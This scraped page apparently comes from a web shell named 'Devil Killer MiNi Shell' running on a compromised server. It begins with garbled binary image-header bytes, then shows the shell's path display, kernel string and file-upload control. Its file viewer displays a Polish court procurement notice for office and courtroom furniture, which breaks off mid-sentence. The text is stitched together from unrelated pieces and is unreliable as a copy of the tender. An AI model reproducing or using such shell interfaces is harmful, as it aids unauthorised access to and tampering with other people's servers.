JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240819/0046182501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie, dostawa i montaż mebli biurowych oraz wyposażenia sal rozpraw <br/>na potrzeby Sądu Rejonowego w Rawie Mazowieckiej. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Okręgowy w Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 7251042790</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Dąbrowskiego 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-921</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">www.zamowienia@lodz.so.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lodz.so.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Sprawowanie wymiaru sprawiedliwości </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie, dostawa i montaż mebli biurowych oraz wyposażenia sal rozpraw <br/>na potrzeby Sądu Rejonowego w Rawie Mazowieckiej. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-65a7d93e-626f-422a-bf6d-77c24a237207</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00461825</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-65a7d93e-626f-422a-bf6d-77c24a237207 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-65a7d93e-626f-422a-bf6d-77c24a237207</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie<br/>eZamówienia): https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-65a7d93e-626f-422a-bf6d-77c24a237207<br/>4. Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj<br/>postępowania/konkursy”).<br/>5. Identyfikator (ID) postępowania na Platformie e-Zamówienia: ocds-148610-65a7d93e-626f-422a-bf6d-77c24a237207<br/>Szczegółowe informacje - SWZ Dział XVI.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Posiadają Państwo:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Państwa;<br/>• na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia danych osobowych, przy czym skorzystanie z prawa do<br/>sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z PZP oraz nie może naruszać integralności<br/>protokołu postępowania oraz jego załączników;<br/>• na podstawie art. 18 RODO prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych ( ul. Stawki 2, 00 - 193 Warszawa)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Państwu:<br/>• prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• prawo sprzeciwu wobec przetwarzania danych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.XXVII.261.10.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres zamówienia obejmuje:<br/>dot. 1 Części – mebli biurowych<br/>- wykonanie, dostawę z wniesieniem mebli do wskazanej przez <br/>Zamawiającego lokalizacji;<br/>- montaż rozmieszczenie/ustawienie mebli w pomieszczeniach <br/>wskazanych przez Zamawiającego,<br/>- w miejscach docelowych wypoziomowanie, a jeśli zachodzi taka <br/>konieczność również przytwierdzenie mebli do ściany.<br/><br/>WYKAZ MEBLI<br/>Nazwa przedmiotu Ilość (w sztukach)<br/>Biurko 32 szt.,<br/>Kontenerek do biurka 32 szt.,<br/>Stolik do pokoju socjalnego 1 szt.,<br/>Szafa aktowa z 4 półkami 73 szt.,<br/>Nadstawka szafy aktowej z 1 półką 73 szt.,<br/>Szafka gospodarcza 12 szt.,<br/>Szafka z 1 półką + nadstawka &#34;witryna&#34; 2 szt.,<br/>Stolik kawowy 2 szt.,<br/>Szafy ubraniowe 12 szt.,<br/>Nadstawka szafy ubraniowej z 1 półką 12 szt.,<br/>Szafki kuchenne dół dwie półki 2 szt.,<br/>Szafki kuchenne góra jedna półka 3 szt.,<br/>Szafka pod zlewozmywak 1 szt.,<br/>Szafka kuchenna dół z szufladami 1 szt.,<br/>Szafka kuchenna góra jedna półka 1 szt.,<br/>Blat kuchenny laminowany 1 szt.<br/><br/>Szczegółowy zakres OPZ stanowi Załącznik 1.1. do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39100000-3 - Meble</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">KRYTERIUM OCENY OFERT WARTOŚĆ<br/>Cena ofertowa – (C) 60%<br/>Okres gwarancji i rękojmi – (GiR) 20%<br/>Czas usunięcia uszkodzenia lub wymiany uszkodzonego mebla, od chwili zgłoszenia /tylko w dni robocze/ – (CUU) 20%<br/><br/>2. Punkty zostaną obliczone dla każdej oferty niepodlegającej odrzuceniu, wg poniższych wytycznych:<br/><br/>KRYTERIUM nr 1 – najniższej ceny:<br/><br/>• CENA OFERTOWA (C) – waga kryterium 60%:<br/><br/>C = C min / C b x 100 x 0,6<br/>gdzie: C - ilość punktów oferty badanej<br/>C min - cena brutto oferty o najniższej cenie<br/>C b - cena brutto oferty badanej<br/><br/>Zamawiający, spośród ofert niepodlegających odrzuceniu, najwyższą liczbę punktów przyzna ofercie najtańszej.<br/>W kryterium CENA OFERTOWA, Wykonawca może otrzymać maksymalnie 100 pkt., z wagą kryterium (60 %).<br/><br/><br/>KRYTERIUM nr 2 - jakościowe:<br/><br/>• GWARANCJA i RĘKOJMIA (GiR) – waga kryterium 20 %:<br/><br/>GiR x 0,2<br/>gdzie: GiR - ilość punktów za długość gwarancji<br/><br/>Wykonawca na wszystkie dostarczone meble udzieli co najmniej 24-miesięcznej gwarancji i rękojmi od dnia podpisania bez zastrzeżeń protokołu odbioru produktów. Gwarancja obejmuje wszystkie elementy dostarczonych mebli.<br/><br/>W kryterium GWARANCJA i RĘKOJMIA Wykonawca może otrzymać maksymalnie 100 pkt., z wagą kryterium (20 %).<br/><br/>KRYTERIUM – GWARANCJA i RĘKOJMIA (GiR)<br/>24 miesiące - 0 pkt<br/>36 miesięcy - 25 pkt <br/>48 miesięcy - 50 pkt <br/>60 miesięcy - 100 pkt<br/><br/>KRYTERIUM nr 3 - jakościowe:<br/><br/>• CZAS USUNIĘCIA USZKODZENIA LUB WYMIANY USZKODZONEGO MEBLA, OD CHWILI ZGŁOSZENIA /TYLKO W DNI ROBOCZE/ – (CUU) – waga kryterium 20 %:<br/><br/>CUU x 0,2<br/>gdzie: CUU - ilość punktów za czas usunięcia uszkodzenia lub wymiany<br/>uszkodzonego mebla, od chwili zgłoszenia<br/><br/>W kryterium CZAS USUNIĘCIA USZKODZENIA LUB WYMIANY USZKODZONEGO MEBLA, OD CHWILI ZGŁOSZENIA Wykonawca może otrzymać maksymalnie 100 pkt., z wagą kryterium (20 %).<br/><br/>CZAS USUNIĘCIA USZKODZENIA LUB WYMIANY USZKODZONEGO MEBLA, OD CHWILI ZGŁOSZENIA (CUU)<br/><br/>6 dni roboczych - 0 pkt <br/>4 dni robocze - 50 pkt <br/>2 dni robocze - 100 pkt<br/><br/>Ocenę ostateczną dla poszczególnych ofert stanowić będzie suma punktów (P) przyznanych za powyższe kryteria zgodnie z wzorem:<br/><br/>P = C x 0,6 + GiR x 0,2 + CUU x 0,2<br/><br/>3. Za ofertę najwyżej ocenioną zostanie uznana oferta, która w sumie uzyska najwyższą łączną liczbę punktów w powyższych kryteriach, zgodnie z SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas usunięcia uszkodzenia lub wymiany uszkodzonego mebla, od chwili zgłoszenia /tylko w dni robocze/</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZAKRES ZAMÓWIENIA OBEJMUJE:<br/>dot. 2 Części – mebli - wyposażenia 3 sal rozpraw.<br/><br/>•	wykonanie, dostawę z wniesieniem mebli do wskazanej przez Zamawiającego lokalizacji;<br/>•	montaż rozmieszczenie/ustawienie mebli w pomieszczeniach wskazanych przez Zamawiającego,<br/>•	w miejscach docelowych wypoziomowanie, a jeśli zachodzi taka konieczność również przytwierdzenie mebli do ściany.<br/>Nazwa przedmiotu	Ilość (w sztukach)<br/>Stół sędziowski 3 szt.,<br/>Przystawka dla protokolanta	3 szt.,<br/>Fotele sędziowskie wysokie 3 szt.,<br/>Fotele sędziowskie niskie 6 szt.,<br/>Pulpit dla świadka	3 szt.,<br/>Stoły dla stron 6 szt.,<br/>Ławy dla stron 6 szt.,<br/>Ławy dla publiczności 18 szt.,<br/>Podest 1 szt.,<br/>Podest 2 szt.,<br/><br/>Szczegółowy zakres OPZ stanowi Załącznik 1.2.do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39100000-3 - Meble</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">KRYTERIUM OCENY OFERT WARTOŚĆ<br/>Cena ofertowa – (C) 60%<br/>Okres gwarancji i rękojmi – (GiR) 20%<br/>Czas usunięcia uszkodzenia lub wymiany uszkodzonego mebla, od chwili zgłoszenia /tylko w dni robocze/ – (CUU) 20%<br/><br/>2. Punkty zostaną obliczone dla każdej oferty niepodlegającej odrzuceniu, wg poniższych wytycznych:<br/><br/>KRYTERIUM nr 1 – najniższej ceny:<br/><br/>• CENA OFERTOWA (C) – waga kryterium 60%:<br/><br/>C = C min / C b x 100 x 0,6<br/>gdzie: C - ilość punktów oferty badanej<br/>C min - cena brutto oferty o najniższej cenie<br/>C b - cena brutto oferty badanej<br/><br/>Zamawiający, spośród ofert niepodlegających odrzuceniu, najwyższą liczbę punktów przyzna ofercie najtańszej.<br/>W kryterium CENA OFERTOWA, Wykonawca może otrzymać maksymalnie 100 pkt., z wagą kryterium (60 %).<br/><br/><br/>KRYTERIUM nr 2 - jakościowe:<br/><br/>• GWARANCJA i RĘKOJMIA (GiR) – waga kryterium 20 %:<br/><br/>GiR x 0,2<br/>gdzie: GiR - ilość punktów za długość gwarancji<br/><br/>Wykonawca na wszystkie dostarczone meble udzieli co najmniej 24-miesięcznej gwarancji i rękojmi od dnia podpisania bez zastrzeżeń protokołu odbioru produktów. Gwarancja obejmuje wszystkie elementy dostarczonych mebli.<br/><br/>W kryterium GWARANCJA i RĘKOJMIA Wykonawca może otrzymać maksymalnie 100 pkt., z wagą kryterium (20 %).<br/><br/>KRYTERIUM – GWARANCJA i RĘKOJMIA (GiR)<br/>24 miesiące - 0 pkt<br/>36 miesięcy - 25 pkt <br/>48 miesięcy - 50 pkt <br/>60 miesięcy - 100 pkt<br/><br/>KRYTERIUM nr 3 - jakościowe:<br/><br/>• CZAS USUNIĘCIA USZKODZENIA LUB WYMIANY USZKODZONEGO MEBLA, OD CHWILI ZGŁOSZENIA /TYLKO W DNI ROBOCZE/ – (CUU) – waga kryterium 20 %:<br/><br/>CUU x 0,2<br/>gdzie: CUU - ilość punktów za czas usunięcia uszkodzenia lub wymiany<br/>uszkodzonego mebla, od chwili zgłoszenia<br/><br/>W kryterium CZAS USUNIĘCIA USZKODZENIA LUB WYMIANY USZKODZONEGO MEBLA, OD CHWILI ZGŁOSZENIA Wykonawca może otrzymać maksymalnie 100 pkt., z wagą kryterium (20 %).<br/><br/>CZAS USUNIĘCIA USZKODZENIA LUB WYMIANY USZKODZONEGO MEBLA, OD CHWILI ZGŁOSZENIA (CUU)<br/><br/>6 dni roboczych - 0 pkt <br/>4 dni robocze - 50 pkt <br/>2 dni robocze - 100 pkt<br/><br/>Ocenę ostateczną dla poszczególnych ofert stanowić będzie suma punktów (P) przyznanych za powyższe kryteria zgodnie z wzorem:<br/><br/>P = C x 0,6 + GiR x 0,2 + CUU x 0,2<br/><br/>3. Za ofertę najwyżej ocenioną zostanie uznana oferta, która w sumie uzyska najwyższą łączną liczbę punktów w powyższych kryteriach, zgodnie z SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas usunięcia uszkodzenia lub wymiany uszkodzonego mebla, od chwili zgłoszenia /tylko w dni robocze/</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu <br/>oraz spełniają warunki udziału w postępowaniu dotyczące: <br/><br/>zdolności technicznej lub zawodowej:<br/><br/>Wykonawca przedstawi wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 2 zadania, każde o wartości dla Części 1 min. 50 000 zł. brutto, dla Części 2 min. 30 000 zł. brutto, każde na podstawie odrębnej umowy, każde na podstawie odrębnej umowy, zgodnych z przedmiotem niniejszego zamówienia, polegających na <br/>wykonaniu, dostawie i montażu mebli biurowych, wraz z podaniem ich <br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy <br/>zostały wykonane lub są wykonywane, oraz załączeniem dowodów <br/>określających, czy te dostawy zostały wykonane lub są wykonywane <br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne <br/>dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi <br/>zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych <br/>są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest <br/>w stanie uzyskać tych dokumentów – oświadczenie 